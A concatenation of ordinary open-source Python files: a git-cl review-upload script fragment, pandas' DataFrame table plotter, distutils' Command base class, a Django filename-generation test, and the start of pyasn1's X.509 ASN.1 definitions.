with misc_utils.ChangeDir(checkout_path, verbose):
vsp.check_call([git, 'fetch', '-q', 'origin'])
with git_utils.ChangeGitBranch(branch_name, upstream, verbose):
vsp.check_call([git, 'cl', 'patch', issue])
git_upload = [
git, 'cl', 'upload', '-t', 'bot report', '-m', message]
if cclist:
git_upload.append('--cc=' + cclist)
if reviewers:
git_upload.append('--reviewers=' + reviewers)
if skip_cl_upload:
branch_name = git_utils.git_branch_name(verbose)
space = ' '
print 'You should call:'
misc_utils.print_subprocess_args(space, ['cd', os.getcwd()])
misc_utils.print_subprocess_args(
space, [git, 'checkout', branch_name])
misc_utils.print_subprocess_args(space, git_upload)
else:
vsp.check_call(git_upload)
print vsp.check_output([git, 'cl', 'issue'])
def main(argv):
"""main function; see module-level docstring and GetOptionParser help.
Args:
argv: sys.argv[1:]-type argument list.
"""
option_parser = optparse.OptionParser(usage=__doc__)
option_parser.add_option(
'-c', '--checkout_path',
default=os.curdir,
help='Path to the Git repository checkout,'
' defaults to current working directory.')
option_parser.add_option(
'', '--skip_cl_upload', action='store_true', default=False,
help='Skip the cl upload step; useful for testing.')
option_parser.add_option(
'', '--verbose', action='store_true', dest='verbose', default=False,
help='Do not suppress the output from `git cl`.',)
option_parser.add_option(
'', '--git_path', default='git',
help='Git executable, defaults to "git".',)
option_parser.add_option(
'', '--reviewers', default=DEFAULT_REVIEWERS,
help=('Comma-separated list of reviewers. Default is "%s".'
% DEFAULT_REVIEWERS))
option_parser.add_option(
'', '--cc', default=DEFAULT_CC_LIST,
help=('Comma-separated list of addresses to be carbon-copied.'
' Default is "%s".' % DEFAULT_CC_LIST))
options, arguments = option_parser.parse_args(argv)
if not options.checkout_path:
option_parser.error('Must specify checkout_path.')
if not git_utils.git_executable():
option_parser.error('Invalid git executable.')
if len(arguments) > 1:
option_parser.error('Extra arguments.')
if len(arguments) != 1:
option_parser.error('Missing Codereview URL.')
message = sys.stdin.read()
add_codereview_message(arguments[0], message, options.checkout_path,
options.skip_cl_upload, options.verbose,
options.reviewers, options.cc)
if __name__ == '__main__':
main(sys.argv[1:])
|
kenshay/ImageScripter
|
refs/heads/master
|
ProgramData/SystemFiles/Python/Lib/site-packages/pandas/util/doctools.py
|
9
|
import numpy as np
import pandas as pd
import pandas.compat as compat
class TablePlotter(object):
"""
Layout some DataFrames in vertical/horizontal layout for explanation.
Used in merging.rst
"""
def __init__(self, cell_width=0.37, cell_height=0.25, font_size=7.5):
self.cell_width = cell_width
self.cell_height = cell_height
self.font_size = font_size
def _shape(self, df):
"""Calcurate table chape considering index levels"""
row, col = df.shape
return row + df.columns.nlevels, col + df.index.nlevels
def _get_cells(self, left, right, vertical):
"""Calcurate appropriate figure size based on left and right data"""
if vertical:
# calcurate required number of cells
vcells = max(sum([self._shape(l)[0] for l in left]),
self._shape(right)[0])
hcells = (max([self._shape(l)[1] for l in left]) +
self._shape(right)[1])
else:
vcells = max([self._shape(l)[0] for l in left] +
[self._shape(right)[0]])
hcells = sum([self._shape(l)[1] for l in left] +
[self._shape(right)[1]])
return hcells, vcells
def plot(self, left, right, labels=None, vertical=True):
"""
Plot left / right DataFrames in specified layout.
Parameters
----------
left : list of DataFrames before operation is applied
right : DataFrame of operation result
labels : list of str to be drawn as titles of left DataFrames
vertical : bool
If True, use vertical layout. If False, use horizontal layout.
"""
import matplotlib.pyplot as plt
import matplotlib.gridspec as gridspec
if not isinstance(left, list):
left = [left]
left = [self._conv(l) for l in left]
right = self._conv(right)
hcells, vcells = self._get_cells(left, right, vertical)
if vertical:
figsize = self.cell_width * hcells, self.cell_height * vcells
else:
# include margin for titles
figsize = self.cell_width * hcells, self.cell_height * vcells
fig = plt.figure(figsize=figsize)
if vertical:
gs = gridspec.GridSpec(len(left), hcells)
# left
max_left_cols = max([self._shape(l)[1] for l in left])
max_left_rows = max([self._shape(l)[0] for l in left])
for i, (l, label) in enumerate(zip(left, labels)):
ax = fig.add_subplot(gs[i, 0:max_left_cols])
self._make_table(ax, l, title=label,
height=1.0 / max_left_rows)
# right
ax = plt.subplot(gs[:, max_left_cols:])
self._make_table(ax, right, title='Result', height=1.05 / vcells)
fig.subplots_adjust(top=0.9, bottom=0.05, left=0.05, right=0.95)
else:
max_rows = max([self._shape(df)[0] for df in left + [right]])
height = 1.0 / np.max(max_rows)
gs = gridspec.GridSpec(1, hcells)
# left
i = 0
for l, label in zip(left, labels):
sp = self._shape(l)
ax = fig.add_subplot(gs[0, i:i + sp[1]])
self._make_table(ax, l, title=label, height=height)
i += sp[1]
# right
ax = plt.subplot(gs[0, i:])
self._make_table(ax, right, title='Result', height=height)
fig.subplots_adjust(top=0.85, bottom=0.05, left=0.05, right=0.95)
return fig
def _conv(self, data):
"""Convert each input to appropriate for table outplot"""
if isinstance(data, pd.Series):
if data.name is None:
data = data.to_frame(name='')
else:
data = data.to_frame()
data = data.fillna('NaN')
return data
def _insert_index(self, data):
# insert is destructive
data = data.copy()
idx_nlevels = data.index.nlevels
if idx_nlevels == 1:
data.insert(0, 'Index', data.index)
else:
for i in range(idx_nlevels):
data.insert(i, 'Index{0}'.format(i),
data.index.get_level_values(i))
col_nlevels = data.columns.nlevels
if col_nlevels > 1:
col = data.columns.get_level_values(0)
values = [data.columns.get_level_values(i).values
for i in range(1, col_nlevels)]
col_df = pd.DataFrame(values)
data.columns = col_df.columns
data = pd.concat([col_df, data])
data.columns = col
return data
def _make_table(self, ax, df, title, height=None):
if df is None:
ax.set_visible(False)
return
import pandas.tools.plotting as plotting
idx_nlevels = df.index.nlevels
col_nlevels = df.columns.nlevels
# must be convert here to get index levels for colorization
df = self._insert_index(df)
tb = plotting.table(ax, df, loc=9)
tb.set_fontsize(self.font_size)
if height is None:
height = 1.0 / (len(df) + 1)
props = tb.properties()
for (r, c), cell in compat.iteritems(props['celld']):
if c == -1:
cell.set_visible(False)
elif r < col_nlevels and c < idx_nlevels:
cell.set_visible(False)
elif r < col_nlevels or c < idx_nlevels:
cell.set_facecolor('#AAAAAA')
cell.set_height(height)
ax.set_title(title, size=self.font_size)
ax.axis('off')
if __name__ == "__main__":
import matplotlib.pyplot as plt
p = TablePlotter()
df1 = pd.DataFrame({'A': [10, 11, 12],
'B': [20, 21, 22],
'C': [30, 31, 32]})
df2 = pd.DataFrame({'A': [10, 12],
'C': [30, 32]})
p.plot([df1, df2], pd.concat([df1, df2]),
labels=['df1', 'df2'], vertical=True)
plt.show()
df3 = pd.DataFrame({'X': [10, 12],
'Z': [30, 32]})
p.plot([df1, df3], pd.concat([df1, df3], axis=1),
labels=['df1', 'df2'], vertical=False)
plt.show()
idx = pd.MultiIndex.from_tuples([(1, 'A'), (1, 'B'), (1, 'C'),
(2, 'A'), (2, 'B'), (2, 'C')])
col = pd.MultiIndex.from_tuples([(1, 'A'), (1, 'B')])
df3 = pd.DataFrame({'v1': [1, 2, 3, 4, 5, 6],
'v2': [5, 6, 7, 8, 9, 10]},
index=idx)
df3.columns = col
p.plot(df3, df3, labels=['df3'])
plt.show()
|
blacklin/kbengine
|
refs/heads/master
|
kbe/res/scripts/common/Lib/distutils/cmd.py
|
97
|
"""distutils.cmd
Provides the Command class, the base class for the command classes
in the distutils.command package.
"""
import sys, os, re
from distutils.errors import DistutilsOptionError
from distutils import util, dir_util, file_util, archive_util, dep_util
from distutils import log
class Command:
"""Abstract base class for defining command classes, the "worker bees"
of the Distutils. A useful analogy for command classes is to think of
them as subroutines with local variables called "options". The options
are "declared" in 'initialize_options()' and "defined" (given their
final values, aka "finalized") in 'finalize_options()', both of which
must be defined by every command class. The distinction between the
two is necessary because option values might come from the outside
world (command line, config file, ...), and any options dependent on
other options must be computed *after* these outside influences have
been processed -- hence 'finalize_options()'. The "body" of the
subroutine, where it does all its work based on the values of its
options, is the 'run()' method, which must also be implemented by every
command class.
"""
# 'sub_commands' formalizes the notion of a "family" of commands,
# eg. "install" as the parent with sub-commands "install_lib",
# "install_headers", etc. The parent of a family of commands
# defines 'sub_commands' as a class attribute; it's a list of
# (command_name : string, predicate : unbound_method | string | None)
# tuples, where 'predicate' is a method of the parent command that
# determines whether the corresponding command is applicable in the
# current situation. (Eg. we "install_headers" is only applicable if
# we have any C header files to install.) If 'predicate' is None,
# that command is always applicable.
#
# 'sub_commands' is usually defined at the *end* of a class, because
# predicates can be unbound methods, so they must already have been
# defined. The canonical example is the "install" command.
sub_commands = []
# -- Creation/initialization methods -------------------------------
def __init__(self, dist):
"""Create and initialize a new Command object. Most importantly,
invokes the 'initialize_options()' method, which is the real
initializer and depends on the actual command being
instantiated.
"""
# late import because of mutual dependence between these classes
from distutils.dist import Distribution
if not isinstance(dist, Distribution):
raise TypeError("dist must be a Distribution instance")
if self.__class__ is Command:
raise RuntimeError("Command is an abstract class")
self.distribution = dist
self.initialize_options()
# Per-command versions of the global flags, so that the user can
# customize Distutils' behaviour command-by-command and let some
# commands fall back on the Distribution's behaviour. None means
# "not defined, check self.distribution's copy", while 0 or 1 mean
# false and true (duh). Note that this means figuring out the real
# value of each flag is a touch complicated -- hence "self._dry_run"
# will be handled by __getattr__, below.
# XXX This needs to be fixed.
self._dry_run = None
# verbose is largely ignored, but needs to be set for
# backwards compatibility (I think)?
self.verbose = dist.verbose
# Some commands define a 'self.force' option to ignore file
# timestamps, but methods defined *here* assume that
# 'self.force' exists for all commands. So define it here
# just to be safe.
self.force = None
# The 'help' flag is just used for command-line parsing, so
# none of that complicated bureaucracy is needed.
self.help = 0
# 'finalized' records whether or not 'finalize_options()' has been
# called. 'finalize_options()' itself should not pay attention to
# this flag: it is the business of 'ensure_finalized()', which
# always calls 'finalize_options()', to respect/update it.
self.finalized = 0
# XXX A more explicit way to customize dry_run would be better.
def __getattr__(self, attr):
if attr == 'dry_run':
myval = getattr(self, "_" + attr)
if myval is None:
return getattr(self.distribution, attr)
else:
return myval
else:
raise AttributeError(attr)
def ensure_finalized(self):
if not self.finalized:
self.finalize_options()
self.finalized = 1
# Subclasses must define:
# initialize_options()
# provide default values for all options; may be customized by
# setup script, by options from config file(s), or by command-line
# options
# finalize_options()
# decide on the final values for all options; this is called
# after all possible intervention from the outside world
# (command-line, option file, etc.) has been processed
# run()
# run the command: do whatever it is we're here to do,
# controlled by the command's various option values
def initialize_options(self):
"""Set default values for all the options that this command
supports. Note that these defaults may be overridden by other
commands, by the setup script, by config files, or by the
command-line. Thus, this is not the place to code dependencies
between options; generally, 'initialize_options()' implementations
are just a bunch of "self.foo = None" assignments.
This method must be implemented by all command classes.
"""
raise RuntimeError("abstract method -- subclass %s must override"
% self.__class__)
def finalize_options(self):
"""Set final values for all the options that this command supports.
This is always called as late as possible, ie. after any option
assignments from the command-line or from other commands have been
done. Thus, this is the place to code option dependencies: if
'foo' depends on 'bar', then it is safe to set 'foo' from 'bar' as
long as 'foo' still has the same value it was assigned in
'initialize_options()'.
This method must be implemented by all command classes.
"""
raise RuntimeError("abstract method -- subclass %s must override"
% self.__class__)
def dump_options(self, header=None, indent=""):
from distutils.fancy_getopt import longopt_xlate
if header is None:
header = "command options for '%s':" % self.get_command_name()
self.announce(indent + header, level=log.INFO)
indent = indent + " "
for (option, _, _) in self.user_options:
option = option.translate(longopt_xlate)
if option[-1] == "=":
option = option[:-1]
value = getattr(self, option)
self.announce(indent + "%s = %s" % (option, value),
level=log.INFO)
def run(self):
"""A command's raison d'etre: carry out the action it exists to
perform, controlled by the options initialized in
'initialize_options()', customized by other commands, the setup
script, the command-line, and config files, and finalized in
'finalize_options()'. All terminal output and filesystem
interaction should be done by 'run()'.
This method must be implemented by all command classes.
"""
raise RuntimeError("abstract method -- subclass %s must override"
% self.__class__)
def announce(self, msg, level=1):
"""If the current verbosity level is of greater than or equal to
'level' print 'msg' to stdout.
"""
log.log(level, msg)
def debug_print(self, msg):
"""Print 'msg' to stdout if the global DEBUG (taken from the
DISTUTILS_DEBUG environment variable) flag is true.
"""
from distutils.debug import DEBUG
if DEBUG:
print(msg)
sys.stdout.flush()
# -- Option validation methods -------------------------------------
# (these are very handy in writing the 'finalize_options()' method)
#
# NB. the general philosophy here is to ensure that a particular option
# value meets certain type and value constraints. If not, we try to
# force it into conformance (eg. if we expect a list but have a string,
# split the string on comma and/or whitespace). If we can't force the
# option into conformance, raise DistutilsOptionError. Thus, command
# classes need do nothing more than (eg.)
# self.ensure_string_list('foo')
# and they can be guaranteed that thereafter, self.foo will be
# a list of strings.
def _ensure_stringlike(self, option, what, default=None):
val = getattr(self, option)
if val is None:
setattr(self, option, default)
return default
elif not isinstance(val, str):
raise DistutilsOptionError("'%s' must be a %s (got `%s`)"
% (option, what, val))
return val
def ensure_string(self, option, default=None):
"""Ensure that 'option' is a string; if not defined, set it to
'default'.
"""
self._ensure_stringlike(option, "string", default)
def ensure_string_list(self, option):
"""Ensure that 'option' is a list of strings. If 'option' is
currently a string, we split it either on /,\s*/ or /\s+/, so
"foo bar baz", "foo,bar,baz", and "foo, bar baz" all become
["foo", "bar", "baz"].
"""
val = getattr(self, option)
if val is None:
return
elif isinstance(val, str):
setattr(self, option, re.split(r',\s*|\s+', val))
else:
if isinstance(val, list):
ok = all(isinstance(v, str) for v in val)
else:
ok = False
if not ok:
raise DistutilsOptionError(
"'%s' must be a list of strings (got %r)"
% (option, val))
def _ensure_tested_string(self, option, tester, what, error_fmt,
default=None):
val = self._ensure_stringlike(option, what, default)
if val is not None and not tester(val):
raise DistutilsOptionError(("error in '%s' option: " + error_fmt)
% (option, val))
def ensure_filename(self, option):
"""Ensure that 'option' is the name of an existing file."""
self._ensure_tested_string(option, os.path.isfile,
"filename",
"'%s' does not exist or is not a file")
def ensure_dirname(self, option):
self._ensure_tested_string(option, os.path.isdir,
"directory name",
"'%s' does not exist or is not a directory")
# -- Convenience methods for commands ------------------------------
def get_command_name(self):
if hasattr(self, 'command_name'):
return self.command_name
else:
return self.__class__.__name__
def set_undefined_options(self, src_cmd, *option_pairs):
"""Set the values of any "undefined" options from corresponding
option values in some other command object. "Undefined" here means
"is None", which is the convention used to indicate that an option
has not been changed between 'initialize_options()' and
'finalize_options()'. Usually called from 'finalize_options()' for
options that depend on some other command rather than another
option of the same command. 'src_cmd' is the other command from
which option values will be taken (a command object will be created
for it if necessary); the remaining arguments are
'(src_option,dst_option)' tuples which mean "take the value of
'src_option' in the 'src_cmd' command object, and copy it to
'dst_option' in the current command object".
"""
# Option_pairs: list of (src_option, dst_option) tuples
src_cmd_obj = self.distribution.get_command_obj(src_cmd)
src_cmd_obj.ensure_finalized()
for (src_option, dst_option) in option_pairs:
if getattr(self, dst_option) is None:
setattr(self, dst_option, getattr(src_cmd_obj, src_option))
def get_finalized_command(self, command, create=1):
"""Wrapper around Distribution's 'get_command_obj()' method: find
(create if necessary and 'create' is true) the command object for
'command', call its 'ensure_finalized()' method, and return the
finalized command object.
"""
cmd_obj = self.distribution.get_command_obj(command, create)
cmd_obj.ensure_finalized()
return cmd_obj
# XXX rename to 'get_reinitialized_command()'? (should do the
# same in dist.py, if so)
def reinitialize_command(self, command, reinit_subcommands=0):
return self.distribution.reinitialize_command(command,
reinit_subcommands)
def run_command(self, command):
"""Run some other command: uses the 'run_command()' method of
Distribution, which creates and finalizes the command object if
necessary and then invokes its 'run()' method.
"""
self.distribution.run_command(command)
def get_sub_commands(self):
"""Determine the sub-commands that are relevant in the current
distribution (ie., that need to be run). This is based on the
'sub_commands' class attribute: each tuple in that list may include
a method that we call to determine if the subcommand needs to be
run for the current distribution. Return a list of command names.
"""
commands = []
for (cmd_name, method) in self.sub_commands:
if method is None or method(self):
commands.append(cmd_name)
return commands
# -- External world manipulation -----------------------------------
def warn(self, msg):
log.warn("warning: %s: %s\n" %
(self.get_command_name(), msg))
def execute(self, func, args, msg=None, level=1):
util.execute(func, args, msg, dry_run=self.dry_run)
def mkpath(self, name, mode=0o777):
dir_util.mkpath(name, mode, dry_run=self.dry_run)
def copy_file(self, infile, outfile, preserve_mode=1, preserve_times=1,
link=None, level=1):
"""Copy a file respecting verbose, dry-run and force flags. (The
former two default to whatever is in the Distribution object, and
the latter defaults to false for commands that don't define it.)"""
return file_util.copy_file(infile, outfile, preserve_mode,
preserve_times, not self.force, link,
dry_run=self.dry_run)
def copy_tree(self, infile, outfile, preserve_mode=1, preserve_times=1,
preserve_symlinks=0, level=1):
"""Copy an entire directory tree respecting verbose, dry-run,
and force flags.
"""
return dir_util.copy_tree(infile, outfile, preserve_mode,
preserve_times, preserve_symlinks,
not self.force, dry_run=self.dry_run)
def move_file (self, src, dst, level=1):
"""Move a file respecting dry-run flag."""
return file_util.move_file(src, dst, dry_run=self.dry_run)
def spawn(self, cmd, search_path=1, level=1):
"""Spawn an external command respecting dry-run flag."""
from distutils.spawn import spawn
spawn(cmd, search_path, dry_run=self.dry_run)
def make_archive(self, base_name, format, root_dir=None, base_dir=None,
owner=None, group=None):
return archive_util.make_archive(base_name, format, root_dir, base_dir,
dry_run=self.dry_run,
owner=owner, group=group)
def make_file(self, infiles, outfile, func, args,
exec_msg=None, skip_msg=None, level=1):
"""Special case of 'execute()' for operations that process one or
more input files and generate one output file. Works just like
'execute()', except the operation is skipped and a different
message printed if 'outfile' already exists and is newer than all
files listed in 'infiles'. If the command defined 'self.force',
and it is true, then the command is unconditionally run -- does no
timestamp checks.
"""
if skip_msg is None:
skip_msg = "skipping %s (inputs unchanged)" % outfile
# Allow 'infiles' to be a single string
if isinstance(infiles, str):
infiles = (infiles,)
elif not isinstance(infiles, (list, tuple)):
raise TypeError(
"'infiles' must be a string, or a list or tuple of strings")
if exec_msg is None:
exec_msg = "generating %s from %s" % (outfile, ', '.join(infiles))
# If 'outfile' must be regenerated (either because it doesn't
# exist, is out-of-date, or the 'force' flag is true) then
# perform the action that presumably regenerates it
if self.force or dep_util.newer_group(infiles, outfile):
self.execute(func, args, exec_msg, level)
# Otherwise, print the "skip" message
else:
log.debug(skip_msg)
# XXX 'install_misc' class not currently used -- it was the base class for
# both 'install_scripts' and 'install_data', but they outgrew it. It might
# still be useful for 'install_headers', though, so I'm keeping it around
# for the time being.
class install_misc(Command):
"""Common base class for installing some files in a subdirectory.
Currently used by install_data and install_scripts.
"""
user_options = [('install-dir=', 'd', "directory to install the files to")]
def initialize_options (self):
self.install_dir = None
self.outfiles = []
def _install_dir_from(self, dirname):
self.set_undefined_options('install', (dirname, 'install_dir'))
def _copy_files(self, filelist):
self.outfiles = []
if not filelist:
return
self.mkpath(self.install_dir)
for f in filelist:
self.copy_file(f, self.install_dir)
self.outfiles.append(os.path.join(self.install_dir, f))
def get_outputs(self):
return self.outfiles
|
taaviteska/django
|
refs/heads/master
|
tests/file_storage/test_generate_filename.py
|
124
|
import os
from django.core.files.base import ContentFile
from django.core.files.storage import Storage
from django.db.models import FileField
from django.test import SimpleTestCase
class AWSS3Storage(Storage):
"""
Simulate an AWS S3 storage which uses Unix-like paths and allows any
characters in file names but where there aren't actual folders but just
keys.
"""
prefix = 'mys3folder/'
def _save(self, name, content):
"""
This method is important to test that Storage.save() doesn't replace
'\' with '/' (rather FileSystemStorage.save() does).
"""
return name
def get_valid_name(self, name):
return name
def get_available_name(self, name, max_length=None):
return name
def generate_filename(self, filename):
"""
This is the method that's important to override when using S3 so that
os.path() isn't called, which would break S3 keys.
"""
return self.prefix + self.get_valid_name(filename)
class GenerateFilenameStorageTests(SimpleTestCase):
def test_filefield_generate_filename(self):
f = FileField(upload_to='some/folder/')
self.assertEqual(
f.generate_filename(None, 'test with space.txt'),
os.path.normpath('some/folder/test_with_space.txt')
)
def test_filefield_generate_filename_with_upload_to(self):
def upload_to(instance, filename):
return 'some/folder/' + filename
f = FileField(upload_to=upload_to)
self.assertEqual(
f.generate_filename(None, 'test with space.txt'),
os.path.normpath('some/folder/test_with_space.txt')
)
def test_filefield_awss3_storage(self):
"""
Simulate a FileField with an S3 storage which uses keys rather than
folders and names. FileField and Storage shouldn't have any os.path()
calls that break the key.
"""
storage = AWSS3Storage()
folder = 'not/a/folder/'
f = FileField(upload_to=folder, storage=storage)
key = 'my-file-key\\with odd characters'
data = ContentFile('test')
expected_key = AWSS3Storage.prefix + folder + key
# Simulate call to f.save()
result_key = f.generate_filename(None, key)
self.assertEqual(result_key, expected_key)
result_key = storage.save(result_key, data)
self.assertEqual(result_key, expected_key)
# Repeat test with a callable.
def upload_to(instance, filename):
# Return a non-normalized path on purpose.
return folder + filename
f = FileField(upload_to=upload_to, storage=storage)
# Simulate call to f.save()
result_key = f.generate_filename(None, key)
self.assertEqual(result_key, expected_key)
result_key = storage.save(result_key, data)
self.assertEqual(result_key, expected_key)
|
nirzari18/Query-Analysis-Application-on-Google-App-Engine
|
refs/heads/master
|
lib/pyasn1_modules/rfc2459.py
|
59
|
#
# X.509 message syntax
#
# ASN.1 source from:
# http://www.trl.ibm.com/projects/xml/xss4j/data/asn1/grammars/x509.asn
# http://www.ietf.org/rfc/rfc2459.txt
#
# Sample captures from:
# http://wiki.wireshark.org/SampleCaptures/
#
from pyasn1.type import tag,namedtype,namedval,univ,constraint,char,useful
MAX = 64 # XXX ?
#
# PKIX1Explicit88
#
# Upper Bounds
ub_name = univ.Integer(32768)
ub_common_name = univ.Integer(64)
ub_locality_name = univ.Integer(128)
ub_state_name = univ.Integer(128)
ub_organization_name = univ.Integer(64)
ub_organizational_unit_name = univ.Integer(64)
ub_title = univ.Integer(64)
ub_match = univ.Integer(128)
ub_emailaddress_length = univ.Integer(128)
ub_common_name_length = univ.Integer(64)
ub_country_name_alpha_length = univ.Integer(2)
ub_country_name_numeric_length = univ.Integer(3)
ub_domain_defined_attributes = univ.Integer(4)
ub_domain_defined_attribute_type_length = univ.Integer(8)
ub_domain_defined_attribute_value_length = univ.Integer(128)
ub_domain_name_length = univ.Integer(16)
ub_extension_attributes = univ.Integer(256)
ub_e163_4_number_length = univ.Integer(15)
ub_e163_4_sub_address_length = univ.Integer(40)
ub_generation_qualifier_length = univ.Integer(3)
ub_given_name_length = univ.Integer(16)
ub_initials_length = univ.Integer(5)
ub_integer_options = univ.Integer(256)
ub_numeric_user_id_length = univ.Integer(32)
ub_organization_name_length = univ.Integer(64)
ub_organizational_unit_name_length = univ.Integer(32)
ub_organizational_units = univ.Integer(4)
ub_pds_name_length = univ.Integer(16)
ub_pds_parameter_length = univ.Integer(30)
ub_pds_physical_address_lines = univ.Integer(6)
ub_postal_code_length = univ.Integer(16)
ub_surname_length = univ.Integer(40)
ub_terminal_id_length = univ.Integer(24)
ub_unformatted_address_length = univ.Integer(180)
ub_x121_address_length = univ.Integer(16)
class UniversalString(char.UniversalString): pass
class BMPString(char.BMPString): pass
class UTF8String(char.UTF8String): pass
id_pkix = univ.ObjectIdentifier('1.3.6.1.5.5.7')
id_pe = univ.ObjectIdentifier('1.3.6.1.5.5.7.1')
id_qt = univ.ObjectIdentifier('1.3.6.1.5.5.7.2')
id_kp = univ.ObjectIdentifier('1.3.6.1.5.5.7.3')
id_ad = univ.ObjectIdentifier('1.3.6.1.5.5.7.48')
id_qt_cps = univ.ObjectIdentifier('1.3.6.1.5.5.7.2.1')
id_qt_unotice = univ.ObjectIdentifier('1.3.6.1.5.5.7.2.2')
id_ad_ocsp = univ.ObjectIdentifier('1.3.6.1.5.5.7.48.1')
id_ad_caIssuers = univ.ObjectIdentifier('1.3.6.1.5.5.7.48.2')
class AttributeValue(univ.Any): pass
class AttributeType(univ.ObjectIdentifier): pass
class AttributeTypeAndValue(univ.Sequence):
componentType = namedtype.NamedTypes(
namedtype.NamedType('type', AttributeType()),
namedtype.NamedType('value', AttributeValue())
)
class Attribute(univ.Sequence):
componentType = namedtype.NamedTypes(
namedtype.NamedType('type', AttributeType()),
namedtype.NamedType('vals', univ.SetOf(componentType=AttributeValue()))
)
id_at = univ.ObjectIdentifier('2.5.4')
id_at_name = univ.ObjectIdentifier('2.5.4.41')
id_at_sutname = univ.ObjectIdentifier('2.5.4.4')
id_at_givenName = univ.ObjectIdentifier('2.5.4.42')
id_at_initials = univ.ObjectIdentifier('2.5.4.43')
id_at_generationQualifier = univ.ObjectIdentifier('2.5.4.44')
class X520name(univ.Choice):
componentType = namedtype.NamedTypes(
namedtype.NamedType('teletexString', char.TeletexString().subtype(subtypeSpec=constraint.ValueSizeConstraint(1, ub_name))),
namedtype.NamedType('printableString', char.PrintableString().subtype(subtypeSpec=constraint.ValueSizeConstraint(1, ub_name))),
namedtype.NamedType('universalString', char.UniversalString().subtype(subtypeSpec=constraint.ValueSizeConstraint(1, ub_name))),
namedtype.NamedType('utf8String', char.UTF8String().subtype(subtypeSpec=constraint.ValueSizeConstraint(1, ub_name))),
namedtype.NamedType('bmpString', char.BMPString().subtype(subtypeSpec=constraint.ValueSizeConstraint(1, ub_name)))
)
id_at_commonName = univ.ObjectIdentifier('2.5.4.3')
class X520CommonName(univ.Choice):
componentType = namedtype.NamedTypes(
namedtype.NamedType('teletexString', char.TeletexString().subtype(subtypeSpec=constraint.ValueSizeConstraint(1, ub_common_name))),
namedtype.NamedType('printableString', char.PrintableString().subtype(subtypeSpec=constraint.ValueSizeConstraint(1, ub_common_name))),
namedtype.NamedType('universalString', char.UniversalString().subtype(subtypeSpec=constraint.ValueSizeConstraint(1, ub_common_name))),
namedtype.NamedType('utf8String', char.UTF8String().subtype(subtypeSpec=constraint.ValueSizeConstraint(1, ub_common_name))),
namedtype.NamedType('bmpString', char.BMPString().subtype(subtypeSpec=constraint.ValueSizeConstraint(1, ub_common_name)))
)
id_at_localityName = univ.ObjectIdentifier('2.5.4.7')
class X520LocalityName(univ.Choice):
componentType = namedtype.NamedTypes(
namedtype.NamedType('teletexString', char.TeletexString().subtype(subtypeSpec=constraint.ValueSizeConstraint(1, ub_locality_name))),
namedtype.NamedType('printableString', char.PrintableString().subtype(subtypeSpec=constraint.ValueSizeConstraint(1, ub_locality_name))),
namedtype.NamedType('universalString', char.UniversalString().subtype(subtypeSpec=constraint.ValueSizeConstraint(1, ub_locality_name))),
namedtype.NamedType('utf8String', char.UTF8String().subtype(subtypeSpec=constraint.ValueSizeConstraint(1, ub_locality_name))),
namedtype.NamedType('bmpString', char.BMPString().subtype(subtypeSpec=constraint.ValueSizeConstraint(1, ub_locality_name)))
)
id_at_stateOrProvinceName = univ.ObjectIdentifier('2.5.4.8')
class X520StateOrProvinceName(univ.Choice):
componentType = namedtype.NamedTypes(
namedtype.NamedType('teletexString', char.TeletexString().subtype(subtypeSpec=constraint.ValueSizeConstraint(1, ub_state_name))),
namedtype.NamedType('printableString', char.PrintableString().subtype(subtypeSpec=constraint.ValueSizeConstraint(1, ub_state_name))),
namedtype.NamedType('universalString', char.UniversalString().subtype(subtypeSpec=constraint.ValueSizeConstraint(1, ub_state_name))),
namedtype.NamedType('utf8String', char.UTF8String().subtype(subtypeSpec=constraint.ValueSizeConstraint(1, ub_state_name))),
namedtype.NamedType('bmpString', char.BMPString().subtype(subtypeSpec=constraint.ValueSizeConstraint(1, ub_state_name)))
)
id_at_organizationName = univ.ObjectIdentifier('2.5.4.10')
class X520OrganizationName(univ.Choice):
componentType = namedtype.NamedTypes(
namedtype.NamedType('teletexString', char.TeletexString().subtype(subtypeSpec=constraint.ValueSizeConstraint(1, ub_organization_name))),
namedtype.NamedType('printableString', char.PrintableString().subtype(subtypeSpec=constraint.ValueSizeConstraint(1, ub_organization_name))),
namedtype.NamedType('universalString', char.UniversalString().subtype(subtypeSpec=constraint.ValueSizeConstraint(1, ub_organization_name))),
namedtype.NamedType('utf8String', char.UTF8String().subtype(subtypeSpec=constraint.ValueSizeConstraint(1, ub_organization_name))),
namedtype.NamedType('bmpString', char.BMPString().subtype(subtypeSpec=constraint.ValueSizeConstraint(1, ub_organization_name)))
)
id_at_organizationalUnitName = univ.ObjectIdentifier('2.5.4.11')
class X520OrganizationalUnitName(univ.Choice):
componentType = namedtype.NamedTypes(
namedtype.NamedType('teletexString', char.TeletexString().subtype(subtypeSpec=constraint.ValueSizeConstraint(1, ub_organizational_unit_name))),
namedtype.NamedType('printableString', char.PrintableString().subtype(subtypeSpec=constraint.ValueSizeConstraint(1, ub_organizational_unit_name))),
namedtype.NamedType('universalString', char.UniversalString().subtype(subtypeSpec=constraint.ValueSizeConstraint(1, ub_organizational_unit_name))),
namedtype.NamedType('utf8String', char.UTF8String().subtype(subtypeSpec=constraint.ValueSizeConstraint(1, ub_organizational_unit_name))),
namedtype.NamedType('bmpString', char.BMPString().subtype(subtypeSpec=constraint.ValueSizeConstraint(1, ub_organizational_unit_name)))
)
id_at_title = univ.ObjectIdentifier('2.5.4.12')
class X520Title(univ.Choice):
componentType = namedtype.NamedTypes(
namedtype.NamedType('teletexString', char.TeletexString().subtype(subtypeSpec=constraint.ValueSizeConstraint(1, ub_title))),
namedtype.NamedType('printableString', char.PrintableString().subtype(subtypeSpec=constraint.ValueSizeConstraint(1, ub_title))),
namedtype.NamedType('universalString', char.UniversalString().subtype(subtypeSpec=constraint.ValueSizeConstraint(1, ub_title))),
namedtype.NamedType('utf8String', char.UTF8String().subtype(subtypeSpec=constraint.ValueSizeConstraint(1, ub_title))),
namedtype.NamedType('bmpString', char.BMPString().subtype(subtypeSpec=constraint.ValueSizeConstraint(1, ub_title)))
)
id_at_dnQualifier = univ.ObjectIdentifier('2.5.4.46')
class X520dnQualifier(char.PrintableString): pass
id_at_countryName = univ.ObjectIdentifier('2.5.4.6')
class X520countryName(char.PrintableString):
subtypeSpec = char.PrintableString.subtypeSpec + constraint.ValueSizeConstraint(2, 2)
pkcs_9 = univ.ObjectIdentifier('1.2.840.113549.1.9')
emailAddress = univ.ObjectIdentifier('1.2.840.113549.1.9.1')
class Pkcs9email(char.IA5String):
subtypeSpec = char.IA5String.subtypeSpec + constraint.ValueSizeConstraint(1, ub_emailaddress_length)
# ----
class DSAPrivateKey(univ.Sequence):
